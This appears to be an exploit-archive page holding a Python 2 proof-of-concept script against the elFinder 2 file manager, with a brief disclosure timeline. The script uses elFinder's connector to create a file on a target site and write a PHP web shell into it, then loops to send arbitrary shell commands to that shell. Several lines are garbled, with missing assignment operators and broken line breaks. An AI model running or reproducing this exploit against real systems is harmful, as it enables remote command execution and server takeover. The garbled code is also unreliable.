facebook facebook twitter rss

elFinder 2 Remote Command Execution (Via File Creation) Vulnerability

Author: TUNISIAN CYBER , Published: 10-05-2015

#[+] Author: TUNISIAN CYBER

#[+] Title: elFinder 2 Remote Command Execution (Via File Creation) Vulnerability
#[+] Date: 06-05-2015
#[+] Vendor: https://github.com/Studio-42/elFinder
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
#[+] Time Line:
#    03-05-2015:Vulnerability Discovered
#    03-05-2015:Contacted Vendor
#    04-05-2015:No response
#    05-05-2015:No response
#    06-05-2015:No response
#    06-05-2015:Vulnerability published

import cookielib, urllib
import urllib2
import sys

print"\x20\x20+-------------------------------------------------+"
print"\x20\x20| elFinder Remote Command Execution Vulnerability |"
print"\x20\x20|                 TUNISIAN CYBER                  |"
print"\x20\x20+-------------------------------------------------+"


host = raw_input('\x20\x20Vulnerable Site:')
evilfile = raw_input('\x20\x20EvilFileName:')
path=raw_input('\x20\x20elFinder s Path:')


tcyber = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(tcyber))

create = opener.open('http://'+host+'/'+path+'/php/connector.php?cmd=mkfile&name='+evilfile+'&target=l1_Lw')
#print create.read()

payload = urllib.urlencode({
                            'cmd' : 'put',
                            'target' : 'l1_'+evilfile.encode('base64','strict'),
                            'content' : '<?php passthru($_GET[\'cmd\']); ?>'
                            
})

write opener.open('http://'+host+'/'+path+'/php/connector.php'payload)
#print write.read()
print '\n'
while True:
    try:
        
cmd raw_input('[She3LL]:~# ')

        
execute opener.open('http://'+host+'/'+path+'/admin/js/plugins/elfinder/files/'+evilfile+'?cmd='+urllib.quote(cmd))
        
reverse execute.read()
        print 
reverse;

        if 
cmd.strip() == 'exit':
            break

    
except Exception:
        break

sys.exit()

Like us on Facebook :